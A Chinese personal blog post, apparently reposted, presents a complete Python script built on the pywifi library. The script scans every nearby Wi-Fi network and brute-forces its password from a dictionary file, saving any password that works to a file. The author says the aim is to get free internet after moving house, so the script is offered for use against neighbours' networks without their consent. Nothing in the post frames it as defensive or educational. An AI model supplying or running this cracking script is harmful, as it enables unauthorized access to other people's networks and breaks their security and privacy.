<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>Wi-Fi暴力破解（非原创） | we1x4n&#39;s blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/"></a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="https://we1x4n.github.io/">首页</a>
                
                    <a class="menu-item" href="/archives">文章</a>
                
                    <a class="menu-item" href="/category">分类</a>
                
                    <a class="menu-item" href="/tag">标签</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/"></a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="https://we1x4n.github.io/">首页</a>
                
                    <a class="menu-item" href="/archives">文章</a>
                
                    <a class="menu-item" href="/category">分类</a>
                
                    <a class="menu-item" href="/tag">标签</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Wi-Fi暴力破解（非原创）</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">we1x4n</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">July 19, 2019&nbsp;&nbsp;09:11:43</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>最近搬了新家，因为部分原因没有即使安装宽带，而且房间里的手机信号太差，延迟太高不足以满足我rush b的需求。所以就在网上找了一个Wi-Fi破解的工具</p>
<h1 id="0x02-工作方式"><a href="#0x02-工作方式" class="headerlink" title="0x02 工作方式"></a>0x02 工作方式</h1><p>这个脚本扫描了周围的全部Wi-Fi，根据指定的字典进行暴力破解，使用时只需要指定字典就可以了</p>
<h1 id="0x03-代码"><a href="#0x03-代码" class="headerlink" title="0x03 代码"></a>0x03 代码</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#/usr/local/bin python</span></span><br><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#pip install PyWiFi</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pywifi <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">scans</span><span class="params">(face,timeout)</span>:</span></span><br><span class="line">    <span class="comment">#开始扫描</span></span><br><span class="line">    face.scan()</span><br><span class="line">    time.sleep(timeout)</span><br><span class="line">    <span class="comment">#在若干秒后获取扫描结果</span></span><br><span class="line">    <span class="keyword">return</span> face.scan_results()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test</span><span class="params">(i,face,x,key,stu,ts)</span>:</span></span><br><span class="line">    <span class="comment">#显示对应网络名称，考虑到部分中文名啧显示bssid</span></span><br><span class="line">    showID = x.bssid <span class="keyword">if</span> len(x.ssid)&gt;len(x.bssid) <span class="keyword">else</span> x.ssid</span><br><span class="line">    <span class="comment">#迭代字典并进行爆破</span></span><br><span class="line">    <span class="keyword">for</span> n,k <span class="keyword">in</span> enumerate(key):</span><br><span class="line">        x.key = k.strip()</span><br><span class="line">        <span class="comment">#移除所有热点配置</span></span><br><span class="line">        face.remove_all_network_profiles()</span><br><span class="line">        <span class="comment">#讲封装好的目标尝试连接</span></span><br><span class="line">        face.connect(face.add_network_profile(x))</span><br><span class="line">        <span class="comment">#初始化状态码，考虑到用0会发生些逻辑错误</span></span><br><span class="line">        code = <span class="number">10</span></span><br><span class="line">        t1 = time.time()</span><br><span class="line">        <span class="comment">#循环刷新状态，如果置为0则密码错误，如超时则进行下一个</span></span><br><span class="line">        <span class="keyword">while</span> code!=<span class="number">0</span> :</span><br><span class="line">            time.sleep(<span class="number">0.1</span>)</span><br><span class="line">            code = face.status()</span><br><span class="line">            now = time.time()-t1</span><br><span class="line">            <span class="keyword">if</span> now&gt;ts:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            stu.write(<span class="string">"\r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"</span>%(<span class="number">6</span>,i,<span class="number">18</span>,showID,code,<span class="number">5</span>,now,<span class="number">7</span>,x.signal,<span class="number">10</span>,len(key)-n,<span class="number">10</span>,k.replace(<span class="string">"\n"</span>,<span class="string">""</span>)))</span><br><span class="line">            stu.flush()</span><br><span class="line">            <span class="keyword">if</span> code == <span class="number">4</span>:</span><br><span class="line">                face.disconnect()</span><br><span class="line">                <span class="keyword">return</span> <span class="string">"%-*s| %s | %*s |%*s\n"</span>%(<span class="number">20</span>,x.ssid,x.bssid,<span class="number">3</span>,x.signal,<span class="number">15</span>,k)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="comment">#扫描时常</span></span><br><span class="line">    scantimes = <span class="number">3</span></span><br><span class="line">    <span class="comment">#单个密码测试延迟</span></span><br><span class="line">    testtimes = <span class="number">15</span></span><br><span class="line">    output = sys.stdout</span><br><span class="line">    <span class="comment">#结果文件保存路径</span></span><br><span class="line">    files = <span class="string">"TestRes.txt"</span></span><br><span class="line">    <span class="comment">#字典列表</span></span><br><span class="line">    keys = open(sys.argv[<span class="number">1</span>],<span class="string">"r"</span>).readlines()</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"|KEYS %s"</span>%(len(keys))</span><br><span class="line">    <span class="comment">#实例化一个pywifi对象</span></span><br><span class="line">    wifi = PyWiFi()</span><br><span class="line">    <span class="comment">#选择定一个网卡并赋值于iface</span></span><br><span class="line">    iface = wifi.interfaces()[<span class="number">0</span>]</span><br><span class="line">    <span class="comment">#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置</span></span><br><span class="line">    scanres = scans(iface,scantimes)</span><br><span class="line">    <span class="comment">#统计附近被发现的热点数量</span></span><br><span class="line">    nums = len(scanres)</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"|SCAN GET %s"</span>%(nums)</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"</span>%(<span class="string">"-"</span>*<span class="number">70</span>,<span class="number">6</span>,<span class="string">"WIFIID"</span>,<span class="number">18</span>,<span class="string">"SSID OR BSSID"</span>,<span class="number">2</span>,<span class="string">"N"</span>,<span class="number">4</span>,<span class="string">"time"</span>,<span class="number">7</span>,<span class="string">"signal"</span>,<span class="number">10</span>,<span class="string">"KEYNUM"</span>,<span class="number">10</span>,<span class="string">"KEY"</span>,<span class="string">"="</span>*<span class="number">70</span>)</span><br><span class="line">    <span class="comment">#将每一个热点信息逐一进行测试</span></span><br><span class="line">    <span class="keyword">for</span> i,x <span class="keyword">in</span> enumerate(scanres):</span><br><span class="line">        <span class="comment">#测试完毕后，成功的结果讲存储到files中</span></span><br><span class="line">        res = test(nums-i,iface,x,keys,output,testtimes)</span><br><span class="line">        <span class="keyword">if</span> res:</span><br><span class="line">            open(files,<span class="string">"a"</span>).write(res)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p>这里需要说的是，因为这个pywifi模块的原因，他的代码只能在windows的机器上运行，Linux可能就得用虚拟机+外置网卡了</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>we1x4n</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://we1x4n.github.io/2019/07/19/windows-wifi-crack/">https://we1x4n.github.io/2019/07/19/windows-wifi-crack/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/瞎搞/"># 瞎搞</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2019/04/18/python3-7-install-pyinstaller/">Python3.7安装pyinstaller</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© we1x4n | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
